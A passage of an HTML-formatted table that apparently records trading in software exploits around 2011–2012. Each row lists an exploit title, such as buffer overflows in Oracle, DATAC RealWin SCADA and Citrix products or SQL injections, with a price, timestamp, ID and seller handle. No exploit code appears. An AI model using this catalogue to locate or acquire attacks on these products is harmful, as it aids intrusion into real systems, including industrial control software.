  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Adobe CoolType SING Table win7
  rop 1&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;01-08-2011 18:16&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Citrix Systems Provisioning
  Services 5.6 Buffer Overflow Module&lt;/td&gt;
  &lt;td class="xl66"&gt;300.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;01-08-2011 18:18&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Avaya WinPMD UniteHostRouter
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;07-08-2011 9:42&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle TO_CHAR() Buffer
  Overflow.&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;08-08-2011 14:55&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle DBMS_JAVA_TEST Buffer
  Overflow.&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;08-08-2011 15:08&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle Database and Enterprise
  Manager Grid Control Remote Code Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;14-08-2011 16:26&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle Outside In CDR Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-08-2011 18:27&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle Secure Backup
  Authentication Bypass/Command Injection Vulnerability&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;14-08-2011 16:29&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Firefox sensor.dll Insecure
  Library Loading&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;10-12-2011 13:50&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;IBM Lotus Forms Viewer
  Insecure Library Loading&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;20-07-2012 21:15&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Wireshark Insecure Script
  Loading&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;02-01-2012 14:51&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;PcVue v5.52 (SVUIGrd.ocx)
  ActiveX Control Remote Code Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;04-10-2011 0:45&lt;/td&gt;
  &lt;td class="xl65"&gt;288&lt;/td&gt;
  &lt;td class="xl65"&gt;^rwX&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin SCADA Server
  On_FC_BINFILE_FCS_FILE (0a) Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-10-2011 0:57&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin SCADA Server
  On_FC_CGETTAG_FCS_GETTELEMETRY Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-10-2011 14:42&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin SCADA Server
  On_FC_CGETTAG_FCS_SETTELEMETRY Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-10-2011 14:45&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin SCADA Server
  On_FC_SCRIPT_FCS_STARTPROG Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-10-2011 14:46&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin SCADA Server
  On_FC_CGETTAG_FCS_SETCHANNELTELEMETRY Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-10-2011 14:55&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin SCADA Server
  On_FC_CGETTAG_FCS_GETCHANNELTELEMETRY Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-10-2011 15:03&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Tunnelblick (Mac OS X
  third-party software) Privilege Escalation&lt;/td&gt;
  &lt;td class="xl66"&gt;300.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-10-2011 16:35&lt;/td&gt;
  &lt;td class="xl65"&gt;238&lt;/td&gt;
  &lt;td class="xl65"&gt;subreption&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;OpenVPN Trusted Path Privilege
  Escalation&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;07-10-2011 16:52&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ACDSee FotoSlate Int Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;10-10-2011 16:57&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Safari SVGPathSegList
  Use-After-Free&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;10-08-2012 14:57&lt;/td&gt;
  &lt;td class="xl65"&gt;200&lt;/td&gt;
  &lt;td class="xl65"&gt;dput&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;IBM Lotus Domino Web Server
  If-Modified-Since Remote Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;11-10-2011 1:14&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin FCS_ADDTAGMS
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-10-2011 20:02&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin FCS_CADDTAG
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-10-2011 20:04&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin FCS_CDELTAG
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-10-2011 20:06&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin
  On_FC_BINFILE_FCS_FILE_D Buffer Overflow DEP Bypass&lt;/td&gt;
  &lt;td class="xl66"&gt;150.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-10-2011 20:08&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin
  On_FC_BINFILE_FCS_FILE_B Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-10-2011 20:10&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin
  On_FC_BINFILE_FCS_FILE_C Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-10-2011 20:12&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin
  On_FC_BINFILE_FCS_FILE_E Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-10-2011 20:13&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DATAC RealWin
  On_FC_BINFILE_FCS_FILE_F Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;12-10-2011 20:15&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;HP iNode Management Center
  iNodeMngChecker Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;17-10-2011 11:59&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Microsoft Office Uninitialized
  Object Pointer Vulnerability&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;01-11-2012 4:03&lt;/td&gt;
  &lt;td class="xl65"&gt;354&lt;/td&gt;
  &lt;td class="xl65"&gt;xBoy&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ACDSee XBM Variable Name
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;14-04-2012 11:31&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Cytel Studio LogXact USE
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;03-11-2011 20:49&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;EMC Autostart Domain Name
  Logging Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;05-12-2011 7:11&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle SDO_CS.TRANSFORM_LAYER
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-12-2011 19:29&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle DBLINK_INFO Buffer
  Overflow.&lt;/td&gt;
  &lt;td class="xl66"&gt;400.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-12-2011 20:25&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle
  DBMS_AQJMS_INTERNAL.AQ$_REGISTER Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;300.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-12-2011 23:12&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle
  DBMS_AQJMS_INTERNAL.AQ$_UNREGISTER Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;300.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;13-12-2011 23:15&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DameWare Mini Remote Control
  NTLMSSP Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;14-12-2011 23:33&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DameWare Mini Remote Control
  USERNAME Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;14-12-2011 23:35&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;eSignal WinSig.exe long
  StyleTemplate Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;19-12-2011 23:11&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;NetDecision TFTP Server
  Directory Traversal&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;21-12-2011 23:52&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;CA Total Defense Suite UNC
  Management Console deleteReportTemplate Store d Procedure SQL Injection&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;22-12-2011 0:57&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Sunway Force Control &amp;lt;= 6.1
  httpsvr.exe&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;24-12-2011 2:11&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;HP Managed Printing
  Admistration jobAcct Arbitrary File Creation&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;24-12-2011 16:31&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;HP Managed Printing
  Admistration jobDelivery Arbitrary File Creation&lt;/td&gt;
  &lt;td class="xl66"&gt;25.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;24-12-2011 16:33&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;FreeBSD telnetd Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;75.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;28-12-2011 0:37&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ESTsoft ALZip MIM File Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;28-12-2011 21:49&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Novell iPrint Client ActiveX
  Control GetDriverFile Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;29-12-2011 0:12&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Novell iPrint Client ActiveX
  Control GetDriverSettings Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;29-12-2011 23:08&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;HastyMail rsargs[] Arbitrary
  Command Injection&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;02-01-2012 18:01&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Trend Micro InterScan Web
  Security Suite Local Privilege Escalation&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-01-2012 15:09&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Citrix Provisioning Services
  streamprocess.exe 0x40020000 Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;27-03-2012 20:39&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Citrix Provisioning Services
  streamprocess.exe 0x40020002 Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;27-03-2012 20:40&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Citrix Provisioning Services
  streamprocess.exe 0x40020004 Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;27-03-2012 20:40&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Citrix Provisioning Services
  streamprocess.exe 0x40020006 Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;27-03-2012 20:41&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;SolarWinds Storage Manager
  Server SQL Injection Authentication Bypass And Command Execution&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;27-03-2012 20:41&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Sunway Forcecontrol &amp;lt;= 6.1
  sp3 SNMP NetDBServer.exe&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-01-2012 17:04&lt;/td&gt;
  &lt;td class="xl65"&gt;280&lt;/td&gt;
  &lt;td class="xl65"&gt;James&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Motorola Netopia netOctopus
  SDCS Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;27-03-2012 20:41&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;CA Total Defense Suite
  deleteReportFilter Stored Procedure SQL Injection&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;17-04-2012 17:30&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Exploit-builder for
  CVE-2011-0611&lt;/td&gt;
